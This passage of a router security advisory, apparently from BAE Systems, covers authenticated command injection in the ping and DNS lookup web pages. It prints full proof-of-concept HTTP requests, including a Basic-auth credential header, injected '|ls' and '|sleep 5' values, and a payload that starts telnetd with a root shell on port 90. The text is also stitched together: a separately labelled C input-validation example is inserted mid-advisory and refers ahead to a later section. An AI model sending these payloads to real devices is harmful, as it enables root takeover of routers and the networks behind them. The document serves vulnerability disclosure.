Description
-----------
The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system as the root user.
Proof of concept
----------------
Example exploitation to obtain a file and directory listing:
POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls
To get an interactive shell,
1. Send the following POST data:
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90
Solution
--------
Validate untrusted user input against a whitelist of acceptable values. For example, an IPv4 address value may contain only the digits '0' through '9' and full stops ('.').
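The whitelist approach from the solution above, as an added C example (not code from the advisory, BAE Systems or the router firmware): a validator for the ping target and, going beyond the text, one for the host name passed to the DNS lookup function in section 3, each rejecting any character outside the allowed set before the value could be placed in a command line. The 0..255 octet range and the host name label rules are assumptions added here, not stated in the advisory.

```c
#include <ctype.h>
#include <stddef.h>
/* Whitelist check for the ping target: four dot-separated decimal octets made
 * only of '0'..'9' and '.', each 0..255 (range is an added assumption). "|ls"
 * or "1.2.3.4|ls" fails on the first non-whitelisted character. 1 = valid. */
int is_valid_ipv4(const char *s)
{
    int octets = 0;
    if (s == NULL || *s == '\0') return 0;
    while (*s != '\0') {
        int digits = 0, value = 0;
        if (!isdigit((unsigned char)*s)) return 0;  /* octet starts with a digit */
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s - '0');
            if (++digits > 3 || value > 255) return 0; /* too long / > 255 */
            s++;
        }
        octets++;
        if (*s == '.') {
            if (octets == 4) return 0;              /* trailing dot */
            s++;
        } else if (*s != '\0') {
            return 0;                               /* '|', ';', space ... */
        }
    }
    return octets == 4;
}

/* Whitelist check for the DNS lookup host name (assumed rules): letters,
 * digits, '-' and '.', labels of 1..63 chars that neither start nor end with
 * '-', at most 253 chars in total. "|sleep 5" or "a;b" is rejected outright. */
int is_valid_hostname(const char *s)
{
    size_t total = 0, label = 0;
    if (s == NULL || *s == '\0') return 0;
    for (; *s != '\0'; s++, total++) {
        if (total >= 253) return 0;
        if (*s == '.') {
            if (label == 0 || s[-1] == '-') return 0; /* empty label, "-." */
            label = 0;
        } else if (isalnum((unsigned char)*s) || *s == '-') {
            if (label == 0 && *s == '-') return 0;   /* label starts with '-' */
            if (++label > 63) return 0;
        } else {
            return 0;                               /* anything else */
        }
    }
    return label > 0 && s[-1] != '-';               /* no trailing '.' or '-' */
}
```

Validation is the first layer only; the CGI should also invoke ping or the resolver with an argument vector rather than through a shell, so that a gap in validation cannot turn into command execution.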
3. Blind Command Execution with DNS Lookup
===========================================
Requires
--------
Authenticated access to the web administration interface.
Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.
Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:
POST /dnslookup.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
host_name=|sleep 5&lookup=Lookup
To get an interactive shell,
1. Send the following POST data:
hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
2. Telnet to port 90